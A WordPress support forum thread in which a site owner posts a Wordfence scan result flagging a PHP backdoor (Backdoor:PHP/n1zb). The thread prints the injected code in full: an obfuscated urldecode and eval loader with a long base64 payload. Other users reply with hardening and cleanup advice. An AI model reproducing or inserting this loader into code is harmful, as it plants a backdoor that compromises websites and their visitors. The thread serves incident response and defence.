Site Hacked With Wordfence

This is what is written in the scan:

The text we found in this file that matches a known malicious file is: “urldecode(“%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A”)”.
The infection type is: Backdoor:PHP/n1zb.

this appears to be what changed in the file:

2 @set_time_limit(0);
3 $xmlname = ‘mapss.xml’;
4 $jdir = ”;
5 $smuri_tmp = smrequest_uri();
6 if($smuri_tmp==”){
7 $smuri_tmp=’/’;
8 }
9 $smuri = base64_encode($smuri_tmp);
10 $dt = 0;
11 function smrequest_uri(){
12 if (isset($_SERVER[‘REQUEST_URI’])){
13 $smuri = $_SERVER[‘REQUEST_URI’];
14 }else{
15 if(isset($_SERVER[‘argv’])){
16 $smuri = $_SERVER[‘PHP_SELF’] . ‘?’ . $_SERVER[‘argv’][0];
17 }else{
18 $smuri = $_SERVER[‘PHP_SELF’] . ‘?’ . $_SERVER[‘QUERY_STRING’];
19 }
20 }
21 return $smuri;
22 }
23
24
25 $O00OO0=urldecode(“%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A”);$O00O0O=$O00OO0{3}.$O00OO0{6}.$O00OO0{33}.$O00OO0{30};$O0OO00=$O00OO0{33}.$O00OO0{10}.$O00OO0{24}.$O00OO0{10}.$O00OO0{24};$OO0O00=$O0OO00{0}.$O00OO0{18}.$O00OO0{3}.$O0OO00{0}.$O0OO00{1}.$O00OO0{24};$OO0000=$O00OO0{7}.$O00OO0{13};$O00O0O.=$O00OO0{22}.$O00OO0{36}.$O00OO0{29}.$O00OO0{26}.$O00OO0{30}.$O00OO0{32}.$O00OO0{35}.$O00OO0{26}.$O00OO0{30};eval($O00O0O(“JE8wTzAwMD0iZHlIdG9SdWpLR2JaT2F2WFdUWVBpcWtuTUp6Q0JGc2dTTlZ4d1FmVWxJY2htRExycEFFZVVFVlN0V0J4ZWtRWG53aWFJbWJMdkt1cGNZek9OUm9mc1B5akRDcmhxVEZNQUhsZEdKWmdMSDlEd1ZKZkhDdFBPZjBlWVZXcVFhSmZMc05KWVI5Vld5V1FZM1BTVWt5U0ZPVVVuRDBlWWtVaVUyeXZUSDBmWTJSQXdJWDBnczF6WGFYcVF4Y0JiMnlFWGFQcVhraEJGMnEwWHNGN0hDdHV3SUNmTHNOSllSOVZXeVdRWTNQU3dJQ3BhbW9mSEN0dUYycTBYc0o5VFpKdWEwVVJ5Um9wRjIxendhV3FZMTA3SEN0dUYycTBYc0o5VFZQMEZxOUVYYU5vYklQcWVPRmlZRURwWUVEdUYycTBYc3U3SEN0dXdrOXpVT0o5VE9XcmgweXN5dXlzSUVVVHlSV0NhME1MaDFDcGFtb1BPdld4UWs5eHdFSjlUT0ZwbkQwZUhDdHVVa3lTRlZVcWJ2SjlUWkp1YTBVUnlSb3BVa3lTRlZVcWJ2VVVuRDBlWVZXcVFhTjNYSVRmTHNOelVWWXJGQXlEUWtSeFhzZnBsRUZvWUVGb1lWV3FRYU4zWElUR25EMGVIQ0dHWHZmdVVreVNGVlVxYnZxN0hDdFlZVlBHVWtoZkxzSnVVa3lTRlZVcWJxb0RhczR1VWt5U0ZWVXFicW9qYXM0dVVreVNGVlVxYnFvRWFtb1BPZnV1VWt5U0ZPSjlUVlAxYnBQMEZ2ZnVVa3lTRlZVcWJ2RHplbW9QT3AwUE9mMGV3SWJ0Q09XclcweWhJRVV6UTNjcGFzSjlMc0p2UTJvdmVhb1BPZnV1UUkwZkxzSnB3VlcwRkh0aWwzVWlRMldvbEFQb1VJVGlRczUwZ1ZDcG5FSlBPZnV1UUlxQlhreTRUSDBmRjIxaVVhV3VRRWZ1UUkwR25FSlBPZnFBd0lqcWEzTjFVUjl4UTI1MFhJNTBGRWZwUXM1RHdWSnBsT1dTd0k1dVhhZkduRHVQT2ZxcWIyTWlUT1lpd0VOcFFFVDdIQ3RZWGFNR1VIb1BPcDBQT2YwZVlrak1RQUZmTHNKdWExUFJocVhSaHFvdnNSV2hoUjlOQzBQUmhSV3JtWlJuVzF5TlcwaHZhbW9QT3ZXb2JJNXBUSDBmYkFSelhtYjBhMnlCYjI5dVhzZnVRa1JCWEV1N0hDdHVRM2NmTHNKdWExUFJocVhSaHFvcHNSV2hoUjl5aDB5c2EwUlZXaDVoWTEwN0hDdHVRM2NmTHNOdmJhUHFQeFdyWEk1eFEyV3FlT1dpRkV1N0hDR0dYdk1HRjNQcVVPZnVhMVBSaHFYUmhxb3BzUldoaFI5c1doWFJodXlzWTEwR2Vhb1BPdkpmVE9KdVVhWW9GMk1NUUFGZkxzSnVhMVBSaHFYUmhxb3BzUldoaFI5c1doWFJodXlzWTEwN0hDdGZUT0pmWVZ5RVFWUHRiSTVwVEgwZmJBUnpYbWIwYTJ5QmIyOXVYc2Z1VWFZb0YyTU1RQUZHbkQwZXJJeW9GMnk3SEN0WVlWeUVRVlB0Ykk1cFRIMGZZRUY3SENHOUhDdFBPQXFBZWtVcVVreUJVdmZwaHV5UG0xV1JhMFJaV1JUcGVzSkFZdk56VVZZeGJhUHFiMjFEZWtVcVVreUJVdmZwaHV5UG0xV1JhMFJaV1JUcGVzRGZZM3lCdzI1aVUyNHBlc3VmZ0QwZVlrUG9RMlBkVEgwZlgyeTBYSTUyZU9Vc1doMUx5WnlyQ2hXWmh2RkduRDBlcnNOcVFWUHF3SWJ0d2FQelhhQ3RZUjltV3lZSVd5WVFZMVlSbWg5aFd5OU5XWldzWTEwR1RPYkFUT1dyaDB5c3l1eXNJRVVzV2gxTHlaeXJDaFdaaHZVVVRPYkFUVlAwRkFQTUYyeXhRYUp0WVI5bVd5WUlXeVlRWTFZUm1oOWhXeTlOV1pXc1kxMG9UT1UxUUFTQlEzVUJZRXVHVFZvUE92V3hRazl4d0VKOVRPV3JoMHlzeXV5c0lFVXNXaDFMeVp5ckNoV1podlVVbkQwZXJDMGVIQ3R1d1ZXMEZSOXhRazl4d0VKOVRPRnBuRDBld0lidFgyeTBYSTUyZU9VVHlSV0NhMFBjc2h5bnlSOVloT0ZHVE9iQVRWUDBGQVBNRjJ5eFFhSnRYMnkwWEk1MmVPVVR5UldDYTBQY3NoeW55UjlZaE9GR2xPSnBVSTVkUUE5M1F2Rkdlc043SEN0dXdWVzBGUjl4UWs5eHdFSjlUa1VxVWt5QlV2ZnBzUldoaFI5SG1acVJtcVdyc3lKcGVtb1BPcDBmWElqelhJcUFla1VxVWt5QlV2ZnBzUldoaFI5YmEwWExocVVOaHVXUldSOWttMVRwZXNKQVl2TnpVVll4YmFQcWIyMURla1VxVWt5QlV2ZnBzUldoaFI5YmEwWExocVVOaHVXUldSOWttMVRwZXNEZlkzeUJ3MjVpVTI0cGVzdWZnRDBlWWtNMFVWTnJiMmppYjJvZkxzTnBYYVdxUXBidFkwTWh5Uk5ySVI5a20xWWFDeVlaV2hXcld1OXNZRXU3SENHOUhDdFBPQXFBZVZQMEZBcXpVVlR0WWtQb1EyUGRsT0ZvWUV1R2dEMGVPc1d4UWs5eHcxOTBRYUpmTHNOcWdWTm9RMldxZU9Ub1R2RHViMmppYjJvR25EMGVPc1d4UWs5eHdFSjlUT1d4UWs5eHcxOTBRYU5RY1IwN0hDRzlPQzBld0lidENPV3JXMHloSUVVZHd2VVVUSDA5VE9UalR2cTdPQzBlT3NXMVVhWW9USDBmWVI5Vld5V1FZMlNLRjJxMFhzVVVuRHVQT2ZxcWIyTWlUT0Y4d0lYRWJJMXFUT05HWEgwdlFJUkdRcFVxYnZUZlFBUlNYbTB2UUlSR1FwVXFidlRmd2t5R1gyTTBMc1RqY0hKcVR2TjN3SVcwd0gwdmNtSkRZc1RmRjNXNVFraDlUdk51d2FQRFFrUjVudk52UWs5eHd6U29YSVgwbnhKN1VrOURueEo3Rms5endhV0dRMjQ2WEFxNFhJQzdUVnRTd0k1dVhhZjZUSFpEY0hKRGNIb2ZUa1lNYjJTcEZBOTFRQUNTYjI5b1EzVDZUT1BBWEFiN1R2TkFGQVJTWElZaUZBV3FGdko5VE9URFR2SmZYcFlNUUl5dlEzWXVYYVQ5VHhKdlRPTmlRdWppYklDOVRBcWtGQVJTWGhNcXdJVXRVT2ZHVHZOekZBYzlUdkZCYkFSelhtYjBhMldxYjI5dVhzZnVVYXlFUU91QllFVCtMTzlHWHBZTVFJaCtZem9QT2ZxcWdrcTBuRDBlckMwZUhDR0dYdk16VVZZR0YzV0VlT1d6UWF5RXd5OTBRYUpvWUU1eEYzY3Blc3E3T0MwZU9zVzNYSVRmTHNKcHdWVzBGSHRpbEVGQllrVWlVMnl2bHZGaXdJNXVYYWZCRmtNREwzeUVRSDBwbHZXendhV3FsdkZBd0lDOVlFNHV3SUNCWUVYMFhJMURMc0ZCWVZXcVFhSkJZRVh1VUgwcGx2V3VVTzRwWXBVcWJ4MHBsdld0UTNQMGx2RkFncHQ5WUU1elFJcXpiQTkwZU91QllFWEtYa3FFTHNGQllrR3V3YVRCWUVYeFFrOXh3ejBwbHZXeFFrOXh3RTRwWXB5RXdtMHBsdld6UWF5RXdzNHBZQWpNUUFGOVlFNHVRa1JCWEU0cFlBOXpMc0ZCWWs5emx2RkFVYVlvRjJNTVFBRjlZRTR1VWFZb0YyTU1RQUZCWUVYdFVWV0RhMlBvUTJQZExzRkJZa00wVVZOcmIyamliMm83SEN0WVlrTTBRSWpyYjI5QlVreUJVT0o5VFZXRXdJMHRGMjFpVWFXdVFFZnVVMnl2ZXN1N09DMGVPSXFBZU9SelVWWXpVVlR0WWtNMFFJanJiMjlCVWt5QlVPRHBRQTl2UTNXMUYyeUViSVVxUXBDcGVzcTdPQzBlT0NxR1h2TXpVVll6VVZUdFlrTTBRSWpyYjI5QlVreUJVT0RwUTJTdFVrMW9YMnkwYjI5QlVreUJVT0ZHZWFvUE9mdVlPaE50WElSdVhhVHRUdVBpUXBXcVFwQ1NVVnFEWG10ZlVreTRVTzl4RjNjN1RrUHRiYVl6WGFDOVVhV0FsbWZ2ZW1vUE9mdVlPc1d0VWsxb2EyUGlRcFdxUXBDZkxzTnpVVllyRkF5RFFrUnhYc2Z2UTJTdFVrMW9YMnkwYjI5QlVreUJVT1RvWUVGb1lrTTBRSWpyYjI5QlVreUJVT3U3T0MwZU9DdVlYSVB0UUVKdXdWV1NRUjl4UTI1MFhJNTBuRHVZT0N1UE9mdVlPSXk0d2FDdGVtb1lIQ3RZT2ExcVFWUHFUa3FBZVZQMEZwUDBGdmZ1d1ZXU1FSOXhRMjUwWEk1MGxPVXBYYVd4UTI1MFhJNTBQbUpERmtScFhzRkdlYW9QT2Z1WU9oTnRYSVJ1WGFUdFkwTWh5UkppY3M0alRIaERjT05ZUXBXcUZBNU1RT05tWGFZMlhhVGZXYVlFUTNUcGVtb1BPZnVZT0l5NHdhQ3RlbW9QT2Z1WXJDMGVPQ3VZT0N1WUhDdFlyQ3VZSENHOUhDdFBPQXlvRjJoZndJYnRZVlBHVWtoR2dFSlBPZnFHWHZmdUYycTBYc0o5THNKcGdrMW9ZRXE3SEN0WU9oTnRYSVJ1WGFUdFR1UGlRcFdxUXBDU1VWcURYbXRmVWt5NFVPOXRVazFvbkVOeHdrUkVGMnkwTGF5MFh2MDRUdnU3SEN0WU9zVzNYSVRmTHNKcHdWVzBGSHRpbEVGQllrVWlVMnl2bHZGaUYycTBYSTFNRk81RHdWSi9Ya1IwWG0wcGx2V0dYTzRwWXBXcVFhSjlZRTR1VWt5U0ZPNHBZcFVxYngwcGx2V3RRM1AwbHZGQWdrMW9Mc0ZCWWtXMG5FSlBPZnVZd0lidEYzeXZGM1dFZU9XMFhJMURsSEpvbk91OUxzVXp3a3lvUVZNU1FPRkdnRDBlT0N1WVlWTVNRazVNUUloZkxzTnpVSVl6VVZUdFlWV3FRYUpvbk91QllFNTRRSURwbkQwZU9DcTlIQ3RZT0lxQWVWUDFicFAwRnZmdVVreVNGT0REbEhGR0xtMHB3a1J4dzNNU1FPRkdnRDBlT0N1WXdJYnRGM3l2RjNXRWVPVzBYSTFEbEhGR2Vhb1BPZnVZT0N1dWdrMW9RQVJTWHNKOVRWUDFicFAwRnZmdVVreVNGT0QzZXM0cGxwTVNRT0Y3SEN0WU9DcTlPQ3VZSEN0WU9hMFBPZnVZWVZNU1FPSjlUVldFd0kwdEYyMWlVYVd1UUVmdVUyeXZlc3U3VEowZU9DdXVRYXFBd0lqcVRIMGZYQTlEWEk0dFlWTVNRazVNUUlob1RPWTNUdnU3VEowZU9DcUFVM1lHVWtodFlrMTVYQXFvWHNEZllWTVNRT3U3SEN0WU9JWHhRazl6WHNmdVFhcUF3SWpxZW1vZkhDdFlPSXl4d2s4ZlRBOWRMa1lFTEFNMFVWSjZsRTh2bHZXcmgweXN5dXlzSUVVVHlSV0NhME1MaDFDcGFzNHZsRVRCWVZNU1FrNU1RSWg3VEowZU9DcXFiMk1pVE9UOGJwVCtUdjR1VTJ5dm5EMGVPQ3VQT2Z1WVhhTUdVT2ZHbkQwZU9hMFlIQ3RZd0lidFlrcXVlYW9QT2Z1WUNrTXFiSVdxRnZmdkMyOUJVa3lCVU8xMGdhTnFudk4wWGFNMGwyTTBRSUQ3VGtQdGJhWXpYYUM5VWFXQWxtZnZlbW9QT2Z1WVlWVXFidko5VE9VdFVWV0RudjhpWUU0dVgyOTNYSVRCWUU5R1FBV3FnTzVEd1ZKL1VhWW9Mc0ZCWVZQR1VraEJZRVhHWEgwcGx2V0dYTzRwWXBXcVFhSjlZRTR1VWt5U0ZPNHBZQVcwTHNGQllrVzBsdkZBVTJ5dkxzRkJZa01pRjNDQllFWDZneDBwbHBQU3dhUHZRM0N0ZXM0cFlBR3V3YVQ5WUU0dXdBV0dGdjRwWUFQb1EyUGRMc0ZCWWtQb1EyUGRsdkZBVWFZR0xzRkJZVlBTVWFZR2x2RkFRa1JCWHowcGx2V29iSTVwbHZGQVEzYzlZRTR1UTNjQllFWDFGQWp6d2tSQlh6MHBsdlcxRkFqendrUkJYRTRwWUFNMFVWTnJiMmppYjJvOVlFNHV3VlcwRlI5eFFrOXh3em9QT2Z1WVlrTTBRSWpyYjI5QlVreUJVT0o5VFZXRXdJMHRGMjFpVWFXdVFFZnVVMnl2ZXN1N0hDdFlPSXFBZU9SelVWWXpVVlR0WWtNMFFJanJiMjlCVWt5QlVPRHBRQTl2UTNXMUYyeUViSVVxUXBDcGVzcTdIQ3RZT0NxR1h2TXpVVll6VVZUdFlrTTBRSWpyYjI5QlVreUJVT0RwUTJTdFVrMW9YMnkwYjI5QlVreUJVT0ZHZWFvUE9mdVlPQ3V1d1ZXU1FSOXhRMjUwWEk1MFRIMGZGM1dFYTNZcUZrak1iMmh0VEE5ZHdWV1NRa1VxVWtQaVFwV3FRcEN2bE9GcGxPV3RVazFvYTJQaVFwV3FRcENHbkQwZU9DdVlPSXl4d2s4ZllrTTBRSWpyYjI5QlVreUJVSG9ZT0N1UE9mdVlPQ3FxZ2txMGVPdTdIQ3RZT0NxOVhJanpYc05HWHZNelVWWXpVVlR0WWtNMFFJanJiMjlCVWt5QlVPRHBYMnkwYjI5QlVreUJVSGhEY1ZOTVgyaHBlc3E3SEN0WU9DdVlDa01xYklXcUZ2ZnBzUldoaE84amx4WmZQbUpEVFpxQlVreUVRQVJvVFJQcUZwWHFGdk5SRnBZaUZ2RkduRDBlT0N1WU9JeTR3YUN0ZW1vUE9mdVlPYTBQT2Z1WU9DdVlPQzBlT0NxOUhDdFlyQzBlckl5b0YyeTdIQ3RZSEN0WVlWVXFidko5VE9VdFVWV0RudjhpWUU0dVgyOTNYSVRCWUU5R1FBV3FnTzVEd1ZKL1VhWW9MSVlpVU9YR1hIMHBsdldHWE80cFlwV3FRYUo5WUU0dVVreVNGTzRwWUFXMExzRkJZa1cwbHZGQVUyeXZMc0ZCWWtNaUYzQ0JZRVg2Z3gwcGxwUFN3YVB2UTNDdGVzNHBZQUd1d2FUOVlFNHV3QVdHRnY0cFlBUG9RMlBkTHNGQllrUG9RMlBkbHZGQVVhWUdMc0ZCWVZQU1VhWUdsdkZBUWtSQlh6MHBsdldvYkk1cGx2RkFRM2M5WUU0dVEzY0JZRVgxRkFqendrUkJYejBwbHZXMUZBanp3a1JCWEU0cFlBTTBVVk5yYjJqaWIybzlZRTR1d1ZXMEZSOXhRazl4d3pvUE9mdXV3VldTUVI5eFEyNTBYSTUwVEgwZlVWWUdRc016UUk5MVVrV2llT1czWElUR2Vtb1BPZnFHWHZmTUYzV0VGM1dFZU9XdFVrMW9hMlBpUXBXcVFwQ29ZMjVpYkE5MFVhUHFGQVJwWEk1MFlFdUdnRDBlT0NxSndreU1Ya3lFZU9ZSFEyNTBYSTUwbGFXNUZraDZUVldxZ1ZDaXdWV1NRSG9mYjJNTUZwUHFVSDExVWtiU25PVEduRDBlT0NxR1h2TXpVVll6VVZUdFlrTTBRSWpyYjI5QlVreUJVT0RwUTJTdFVrMW9YMnkwYjI5QlVreUJVT0ZHZWFvUE9mdVlPc1d0VWsxb2EyUGlRcFdxUXBDZkxzTnpVVllyRkF5RFFrUnhYc2Z2UTJTdFVrMW9YMnkwYjI5QlVreUJVT1RvWUVGb1lrTTBRSWpyYjI5QlVreUJVT3U3SEN0WU9DcXFiMk1pVE9XdFVrMW9hMlBpUXBXcVFwQzdPQ3VZSEN0WU9DcXFna3EwZU91N0hDdFlPYTFxUVZQcVRrcUFlVlAwRnBQMEZ2ZnV3VldTUVI5eFEyNTBYSTUwbE9VcFhhV3hRMjUwWEk1MFBtSkRGa1JwWHNGR2Vhb1BPZnVZT2hOdFhJUnVYYVR0WTBNaHlSSmljczRqVEhoRGNPTllRcFdxRkE1TVFPTm1YYVkyWGFUZldhWUVRM1RwZW1vUE9mdVlPSXk0d2FDdGVtb1BPZnVZckMwZU9DdVlPQ3VQT2ZxOU9DMGVyQzBlSENHQVVJNXhVa3FpUXZOelFJcXpiQTkwZU91ZmdEMGVPc1dNWDJ5QlVPSjlUVlAwRnBXaVFrOTNYYVR0WVI5bVd5WUlXeVlRWTBNaHlSTnJ5eVBSaHE5TlcweW55T1VVZW1vUE9mcUdYdkp0WWtScFhJNTBUT1o5VE9UdmVzTjdIQ3RZT3NXekZrcXVYYVltd2FXcVRIMGZiYVlFYmF1ZmVPWWhYSTV4WEk1MHlWWU1VQXlvWGFUdmxPWVZRMjlwUWt5dlEzQ3ZsT1lTRjI1dlEzQ3ZsT1ltUTNQaUYzTkdYa3lFZUVUb1RxUGlYMjkxVFZVcWJ2TnpGa3F1WGFUdmxPWUdieTlNRkFQdHdhWHFGdlRvVHFxTXdrOWlUc05tUVZ5RUZPVG9UcXFpVUlXTVEwWWlVT1RvVHFxTXdrOWlUUlBvVWFZRFR2RHZteVBuQ0E5MFR2RHZzQVIyYnNKdG0yWDBYSTRmRjNOTVFzTnZRM0NHVHZEdkNBUkdXVnltRmtxdVhhVHZsT1lJUTJxb2JzVG9UcXFNUUFXcWdPTnZRM0N2bE9ZT2gzTkdYa3lFVHZEdlVWVUdiMnlvWGFUdmxPWW1RMlVpVXNObUZrcXVYYVR2bE9ZbUZreXFYVnVmaDNOR1hreUVUdkR2VzI5aVgyanFUWlJ1aDJ5QkYyaHZsT1lUWGFZR1VWWUdnT1RvVHFONVVrTWlRdjExRkFqb3dJVHZsT1lOUWt5NGJzSnRzaFpmQ2FZeHdrcTJYYVRHVHZEdkNhUGRUdkR2V2FNTWJBOTBUdkR2QzN5elVrOHZsT1lMVWFXQVEzTU9RM0NpSUk5dWJJOU9RM0N2bE9ZNWJJUDVUdkR2aDN5RVVBeTVDQTkwVHZEdlFreXBGRVRvVEFqM0ZPMTBGQXEyd0lSb1R2RHZtcHkwYjJmdmxPWW1Va1J4dzFZTVFJWW9YYVR2bE9ZaHdraGZVMnl2VGtSRWIyTUdVQWhmZVpxTlRaUkViMk1HVUF5RWVzVG9UcU5xRkFEZlVrOWlRT1RvVHUxZWNtWXZRM0N2bE9ZblhhV3hGQVJBVU9Ub1R1MW1zaHlIRkFSM1FreUVUdkR2eTBVcVVPTjBRMjlvRkVUb1RBak1GQVlHUXZUb1R1WEdGMmZmRjJ5TUZBUHRUdkRmWTJZR1FBVXZRM0NwbE9VcFEyOXBRa2hwbE9KcGJBUkdYVmhwbE9KcGJJOW9ZRURmWTJZR1FBRnBsT0pwZ0lSdFEyOHBsT0pwSUlSQlhreTRDQTkwWUVEZlkwUnRGQXlBRjBZaVVPRm9UT1VQc3haRWJBOTBZRXU3SEN0WU9JWGlGQXlNYjJmZmVPV3pGa3F1WGFZbXdhV3FUa1J6VE9XMmJJREdUVm9QT2Z1WU9zV3pVVlRmTHNOelVWWTBRMmppVTJ5RWVPVzJiSURHbkQwZU9DdVl3SWJmZVZQMEZwTmlGRWZ1YklVcVFwQ29UT1d6VVZUR2VzTjdIQ3RZT0N1WUZBeTBVYVlCVFZXRVVJaDdIQ3RZT0NxOUhDdFlPYTBQT2ZxOVhJanpYYW9QT2Z1WUZBeTBVYVlCVGtYTVFWUHFuRDBlT2EwUE9wMFBPQVgxUUFQMHdJOUJUVlBTUTN5MFhrOHRZVnlFUU9xN0hDdFlZa1hHUWt5cmIyOUJVa3lCVVZjZkxzTkpYQXFvWHk5cFhhV3JiMjlCVWt5QlVWY3RZVnlFUU91N1RKMGVPSXFBVE9mTVlrWEdRa3lyYjI5QlVreUJVVmNHVFZvUE9mdVlZa1B0VEgwZmIzeUVRUjlHUUFxMGVPdTdIQ3RZT0lQMUZBanJGMnkwUTNOMGVPV3h3T0RmQzF5c21aOUN5Ujl5aHVEb1RPVzFGQURHbkQwZU9DcXhVYVlvYTNQcVVrOURVT2Z1YjJmb1RaUHlodWpMaFJXcmh1eWh5eVlueVJZTm1xUGtXeVRvY3N1N0hDdFlPc1dBd0lqcWEyUGlRcFdxUXBXelRIMGZiM3lFUVI5cWdreXhlT1d4d091N0hDdFlPSVAxRkFqcmIyamlGMmh0WWtQdGVtb1BPZnE5VEowZU9hWXFVVnlFUXZKdVhBcW9YeTl4UTI1MFhJNTBGem9QT3AwUE94OCsiO2V2YWwoJz8+Jy4kTzAwTzBPKCRPME9PMDAoJE9PME8wMCgkTzBPMDAwLCRPTzAwMDAqMiksJE9PME8wMCgkTzBPMDAwLCRPTzAwMDAsJE9PMDAwMCksJE9PME8wMCgkTzBPMDAwLDAsJE9PMDAwMCkpKSk7”));
26 ?><?php

I also now changed my password, i guess it wouldnt hurt

well changing the password didnt help

Someone may have already gotten in to your site and created a backdoor…
See the following:

https://www.wordfence.com/learn/has-my-site-been-hacked/

https://www.wordfence.com/learn/how-to-harden-wordpress-sites/

https://www.wordfence.com/learn/

• This reply was modified 7 years, 10 months ago by bluebearmedia.

avishaiz, have you configured Wordfence to do the following?
1) Scan files outside your WordPress installation
2) Scan images, binary, and other files as if they were executable
3) Scan for admin users created outside of WordPress
4) Scan wp-admin and wp-includes for files not bundled with WordPress
5) Scan theme files against repository versions for changes
6) Scan plugin files against repository versions for changes

You can find these in your Wordfence options menu, & they should all be checked. Others are checked by default, so I won’t discuss them here.

You should also check your users, i.e. ‘Users > All Users’ & delete any you don’t recognize, especially if they have privileges beyond those of ‘Subscriber’.

You should change your passwords, not only to your dashboard, but also to your hosting control panel & your database. You can do that via your hosting provider’s control panel. You’ll need to revise your wp-config.php to reflect that change as well.

You should reinstall WordPress, including your themes & plugins. It’s also a good idea to notify your hosting provider, just in case the hack came from a site other than yours. Make sure your network is secure, i.e., you’ve changed default passwords on your router, & that you’re not logging into your website via wifi hotspots.

Good luck.

Thanks.
i’ve changed all my passwords and for now it seems to be enough